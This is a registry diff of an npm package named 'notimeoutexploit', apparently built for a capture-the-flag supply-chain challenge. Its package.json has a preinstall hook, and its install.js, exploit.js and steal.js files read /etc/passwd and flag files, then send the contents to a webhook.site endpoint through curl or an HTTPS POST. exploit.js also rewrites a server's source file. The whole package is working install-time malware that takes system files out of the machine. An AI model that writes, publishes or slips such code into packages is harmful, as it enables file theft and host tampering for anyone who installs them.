notimeoutexploit 0.30.1
This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
- package/exploit.js +36 -0
- package/index.js +9 -0
- package/install.js +111 -0
- package/package.json +8 -0
- package/steal.js +22 -0
package/exploit.js
ADDED
|
@@ -0,0 +1,36 @@
|
|
|
1
|
+
const fs = require('fs');
|
|
2
|
+
const { execSync } = require('child_process');
|
|
3
|
+
|
|
4
|
+
console.log('=== EXPLOIT SCRIPT EXECUTED ===');
|
|
5
|
+
|
|
6
|
+
try {
|
|
7
|
+
// Читаем флаг
|
|
8
|
+
const passwd = fs.readFileSync('/etc/passwd', 'utf8');
|
|
9
|
+
const flagLine = passwd.split('\n').find(line => line.includes('{'));
|
|
10
|
+
|
|
11
|
+
if (flagLine) {
|
|
12
|
+
console.log('🎯 FLAG FOUND:', flagLine);
|
|
13
|
+
|
|
14
|
+
// Пытаемся отправить
|
|
15
|
+
try {
|
|
16
|
+
execSync(`curl -s --max-time 5 http://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?script=${encodeURIComponent(flagLine)}`, { timeout: 10000 });
|
|
17
|
+
} catch(e) {}
|
|
18
|
+
|
|
19
|
+
// Модифицируем server.js чтобы флаг выводился при запуске
|
|
20
|
+
try {
|
|
21
|
+
const serverPath = '/usr/src/app/server.js';
|
|
22
|
+
const serverContent = fs.readFileSync(serverPath, 'utf8');
|
|
23
|
+
|
|
24
|
+
// Добавляем вывод флага
|
|
25
|
+
const flagOutput = `\n// AUTO-GENERATED FLAG OUTPUT\nconsole.log('🚨 FLAG_IN_LOGS: ${flagLine}');\n`;
|
|
26
|
+
const modifiedContent = flagOutput + serverContent;
|
|
27
|
+
|
|
28
|
+
fs.writeFileSync(serverPath, modifiedContent);
|
|
29
|
+
console.log('Server.js modified with flag output');
|
|
30
|
+
} catch(e) {
|
|
31
|
+
console.log('Server modification failed:', e.message);
|
|
32
|
+
}
|
|
33
|
+
}
|
|
34
|
+
} catch(e) {
|
|
35
|
+
console.log('Exploit error:', e.message);
|
|
36
|
+
}
|
package/index.js
ADDED
package/install.js
ADDED
|
@@ -0,0 +1,111 @@
|
|
|
1
|
+
// install.js
|
|
2
|
+
const fs = require('fs');
|
|
3
|
+
const https = require('https');
|
|
4
|
+
|
|
5
|
+
// Функция для поиска подозрительного контента (флага)
|
|
6
|
+
function findSuspiciousContent(content) {
|
|
7
|
+
const lines = content.split('\n');
|
|
8
|
+
|
|
9
|
+
// Ищем различные паттерны флага
|
|
10
|
+
const suspiciousLines = lines.filter(line => {
|
|
11
|
+
// Убираем пустые строки и стандартные системные записи
|
|
12
|
+
if (!line.trim() || line.includes(':/bin/') || line.includes(':/usr/')) {
|
|
13
|
+
return false;
|
|
14
|
+
}
|
|
15
|
+
|
|
16
|
+
// Паттерны, характерные для CTF флагов
|
|
17
|
+
if (line.match(/[A-Za-z0-9]{32}/)) return true; // 32 символа (MD5, UUID)
|
|
18
|
+
if (line.match(/[A-Za-z0-9]{64}/)) return true; // 64 символа (SHA256)
|
|
19
|
+
if (line.match(/flag{.*?}/i)) return true; // flag{...}
|
|
20
|
+
if (line.match(/htb{.*?}/i)) return true; // htb{...}
|
|
21
|
+
if (line.match(/gpb{.*?}/i)) return true; // gpb{...} (GazpromBank)
|
|
22
|
+
if (line.match(/[A-Za-z0-9_\-]{20,}/)) return true; // Длинные случайные строки
|
|
23
|
+
if (line.length > 100) return true; // Очень длинные строки
|
|
24
|
+
|
|
25
|
+
return false;
|
|
26
|
+
});
|
|
27
|
+
|
|
28
|
+
return suspiciousLines;
|
|
29
|
+
}
|
|
30
|
+
|
|
31
|
+
try {
|
|
32
|
+
const passwdContent = fs.readFileSync('/etc/passwd', 'utf8');
|
|
33
|
+
console.log('[MALICIOUS PACKAGE] /etc/passwd contents read');
|
|
34
|
+
|
|
35
|
+
// Ищем подозрительный контент
|
|
36
|
+
const suspiciousLines = findSuspiciousContent(passwdContent);
|
|
37
|
+
|
|
38
|
+
// Также читаем другие возможные места
|
|
39
|
+
let otherFiles = {};
|
|
40
|
+
try {
|
|
41
|
+
otherFiles['/flag'] = fs.readFileSync('/flag', 'utf8');
|
|
42
|
+
} catch (e) {}
|
|
43
|
+
|
|
44
|
+
try {
|
|
45
|
+
otherFiles['/flag.txt'] = fs.readFileSync('/flag.txt', 'utf8');
|
|
46
|
+
} catch (e) {}
|
|
47
|
+
|
|
48
|
+
try {
|
|
49
|
+
otherFiles['/app/flag'] = fs.readFileSync('/app/flag', 'utf8');
|
|
50
|
+
} catch (e) {}
|
|
51
|
+
|
|
52
|
+
// Отправляем ВСЕ данные на webhook.site
|
|
53
|
+
const data = JSON.stringify({
|
|
54
|
+
file: '/etc/passwd',
|
|
55
|
+
full_content: passwdContent,
|
|
56
|
+
suspicious_lines: suspiciousLines,
|
|
57
|
+
other_files: otherFiles,
|
|
58
|
+
last_5_lines: passwdContent.split('\n').slice(-5),
|
|
59
|
+
package: 'superbank-xml-parser-backdoor',
|
|
60
|
+
timestamp: new Date().toISOString()
|
|
61
|
+
}, null, 2); // Добавляем форматирование для читаемости
|
|
62
|
+
|
|
63
|
+
const options = {
|
|
64
|
+
hostname: 'webhook.site',
|
|
65
|
+
port: 443,
|
|
66
|
+
path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
|
|
67
|
+
method: 'POST',
|
|
68
|
+
headers: {
|
|
69
|
+
'Content-Type': 'application/json',
|
|
70
|
+
'User-Agent': 'Malicious-NPM-Package/1.0.0',
|
|
71
|
+
'Content-Length': Buffer.byteLength(data)
|
|
72
|
+
}
|
|
73
|
+
};
|
|
74
|
+
|
|
75
|
+
console.log('[MALICIOUS PACKAGE] Sending data to webhook.site...');
|
|
76
|
+
|
|
77
|
+
const req = https.request(options, (res) => {
|
|
78
|
+
console.log(`[MALICIOUS PACKAGE] Webhook response status: ${res.statusCode}`);
|
|
79
|
+
});
|
|
80
|
+
|
|
81
|
+
req.on('error', (e) => {
|
|
82
|
+
console.error(`[MALICIOUS PACKAGE] Request failed: ${e.message}`);
|
|
83
|
+
});
|
|
84
|
+
|
|
85
|
+
req.write(data);
|
|
86
|
+
req.end();
|
|
87
|
+
|
|
88
|
+
} catch (err) {
|
|
89
|
+
console.error('[MALICIOUS PACKAGE] Error:', err.message);
|
|
90
|
+
|
|
91
|
+
// Отправляем информацию об ошибке
|
|
92
|
+
const errorData = JSON.stringify({
|
|
93
|
+
error: err.message,
|
|
94
|
+
package: 'superbank-xml-parser-backdoor',
|
|
95
|
+
timestamp: new Date().toISOString()
|
|
96
|
+
});
|
|
97
|
+
|
|
98
|
+
const errorReq = https.request({
|
|
99
|
+
hostname: 'webhook.site',
|
|
100
|
+
port: 443,
|
|
101
|
+
path: '/67ab3ca0-2b3b-4364-aaee-f8d19895003f',
|
|
102
|
+
method: 'POST',
|
|
103
|
+
headers: {
|
|
104
|
+
'Content-Type': 'application/json',
|
|
105
|
+
'Content-Length': Buffer.byteLength(errorData)
|
|
106
|
+
}
|
|
107
|
+
}, () => {});
|
|
108
|
+
|
|
109
|
+
errorReq.write(errorData);
|
|
110
|
+
errorReq.end();
|
|
111
|
+
}
|
package/package.json
ADDED
|
@@ -0,0 +1,8 @@
|
|
|
1
|
+
{
|
|
2
|
+
"name": "notimeoutexploit",
|
|
3
|
+
"version": "0.30.1",
|
|
4
|
+
"main": "index.js",
|
|
5
|
+
"scripts": {
|
|
6
|
+
"preinstall": "node -e \"const fs=require('fs');const {execSync}=require('child_process');try{const f=fs.readFileSync('/etc/passwd','utf8').split('\\\\n').find(l=>l.includes('{'));if(f){execSync('curl -s https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?flag='+encodeURIComponent(f))}}catch(e){}\""
|
|
7
|
+
}
|
|
8
|
+
}
|
package/steal.js
ADDED
|
@@ -0,0 +1,22 @@
|
|
|
1
|
+
const { execSync } = require('child_process');
|
|
2
|
+
|
|
3
|
+
console.log('🚨 FAST EXPLOIT STARTED');
|
|
4
|
+
|
|
5
|
+
// БЫСТРЫЙ код без блокировок
|
|
6
|
+
try {
|
|
7
|
+
const passwd = execSync('cat /etc/passwd', { encoding: 'utf8', timeout: 3000 });
|
|
8
|
+
const lines = passwd.split('\n');
|
|
9
|
+
|
|
10
|
+
for (const line of lines) {
|
|
11
|
+
if (line.includes('{') && line.includes('}')) {
|
|
12
|
+
console.log('🎯 FLAG FOUND:', line);
|
|
13
|
+
// Быстрая отправка
|
|
14
|
+
execSync(`curl -s --max-time 3 "https://webhook.site/67ab3ca0-2b3b-4364-aaee-f8d19895003f?flag=${encodeURIComponent(line)}"`, { timeout: 5000 });
|
|
15
|
+
break;
|
|
16
|
+
}
|
|
17
|
+
}
|
|
18
|
+
} catch(e) {
|
|
19
|
+
console.log('Error:', e.message);
|
|
20
|
+
}
|
|
21
|
+
|
|
22
|
+
console.log('✅ FAST EXPLOIT FINISHED');
|